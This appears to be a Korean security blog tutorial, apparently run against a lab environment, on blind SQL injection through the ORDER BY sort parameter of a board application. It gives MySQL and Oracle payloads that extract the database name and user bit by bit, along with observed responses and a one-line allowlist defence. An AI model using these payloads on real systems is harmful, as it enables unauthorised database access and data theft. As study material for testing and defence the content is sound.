


ORDER BY 구문에 대한 SQL Injection 공격

Kwon Oh! JUN 2022. 9. 18. 16:33

# MYSQL

게시판에서 Title을 클릭하고 Burp로 요청을 가로채면 sort_column, sort 파라미터가 확인된다.


CASE WHEN 구문은 ORDER BY 절에서도 사용할 수 있다. ORDER BY의 정렬 기준 컬럼은 바인드 변수로 전달할 수 없어 문자열로 연결되는 경우가 많으므로, 방어 시에는 sort_column 값을 허용된 컬럼명 목록과 대조하여 검증해야 한다.

쿼리 / 결과
select * from tb_board order by (select case when 1=1 then 'a' else (select 'a' union select 'b')end) desc; 내림차순 정렬 ('a' 컬럼 없어서 의미없음)
select * from tb_board order by (select case when 1=2 then 'a' else (select 'a' union select 'b')end) desc; 다중 레코드 오류

MySQL : DB 이름
sort_column=(select case when ascii(substring((select database()),1,1))&1=1 then 'a' else (select 'a' union select 'b')end)&sort=desc 에러 발생 0 DB : b□□□□
sort_column=(select case when ascii(substring((select database()),1,1))&2=2 then 'a' else (select 'a' union select 'b')end)&sort=desc 게시판 내림차순 정렬 1
sort_column=(select case when ascii(substring((select database()),1,1))&4=4 then 'a' else (select 'a' union select 'b')end)&sort=desc 에러 발생 0
sort_column=(select case when ascii(substring((select database()),1,1))&8=8 then 'a' else (select 'a' union select 'b')end)&sort=desc 에러 발생 0
sort_column=(select case when ascii(substring((select database()),1,1))&16=16 then 'a' else (select 'a' union select 'b')end)&sort=desc 에러 발생 0
sort_column=(select case when ascii(substring((select database()),1,1))&32=32 then 'a' else (select 'a' union select 'b')end)&sort=desc 게시판 내림차순 정렬 1
sort_column=(select case when ascii(substring((select database()),1,1))&64=64 then 'a' else (select 'a' union select 'b')end)&sort=desc 게시판 내림차순 정렬 1
sort_column=(select case when ascii(substring((select database()),1,1))&128=128 then 'a' else (select 'a' union select 'b')end)&sort=desc 에러 발생 0
01100010 → 98 → 'b'
...생략    
sort_column=(select case when ascii(substring((select database()),5,1))&128=128 then 'a' else (select 'a' union select 'b')end)&sort=desc   DB : board

# ORACLE


쿼리 / 결과
select * from TB_BOARD order by (select case when 1=1 then 'a' else (select 'a' from dual union select 'b' from dual)end from dual) desc; 내림차순 정렬 ('a' 컬럼 없어서 의미없음)
select * from TB_BOARD order by (select case when 1=2 then 'a' else (select 'a' from dual union select 'b' from dual)end from dual) desc; Posts does not exist. (게시물 존재 x, mysql하고 다르게 오류 안뜨고 게시물이 안뜸)

Oracle : USER 이름
sort_column=(select case when BITAND(ascii(substr((select user from dual),1,1)),1)=1 then 'a' else (select 'a' from dual union select 'b' from dual)end from dual)&sort=desc 내림차순 정렬 1 DB : C□□□□□□□□□□□□□
sort_column=(select case when BITAND(ascii(substr((select user from dual),1,1)),2)=2 then 'a' else (select 'a' from dual union select 'b' from dual)end from dual)&sort=desc 내림차순 정렬 1
sort_column=(select case when BITAND(ascii(substr((select user from dual),1,1)),4)=4 then 'a' else (select 'a' from dual union select 'b' from dual)end from dual)&sort=desc Posts does not exist. 0
sort_column=(select case when BITAND(ascii(substr((select user from dual),1,1)),8)=8  then 'a' else (select 'a' from dual union select 'b' from dual)end from dual)&sort=desc Posts does not exist. 0
sort_column=(select case when BITAND(ascii(substr((select user from dual),1,1)),16)=16 then 'a' else (select 'a' from dual union select 'b' from dual)end from dual)&sort=desc Posts does not exist. 0
sort_column=(select case when BITAND(ascii(substr((select user from dual),1,1)),32)=32 then 'a' else (select 'a' from dual union select 'b' from dual)end from dual)&sort=desc Posts does not exist. 0
sort_column=(select case when BITAND(ascii(substr((select user from dual),1,1)),64)=64 then 'a' else (select 'a' from dual union select 'b' from dual)end from dual)&sort=desc 내림차순 정렬 1
sort_column=(select case when BITAND(ascii(substr((select user from dual),1,1)),128)=128 then 'a' else (select 'a' from dual union select 'b' from dual)end from dual)&sort=desc Posts does not exist. 0
01000011 → 67 → 'C'
...생략    
sort_column=(select case when BITAND(ascii(substr((select user from dual),14,1)),128)=128 then 'a' else (select 'a' from dual union select 'b' from dual)end from dual)&sort=desc   DB : C##CREHACKTIVE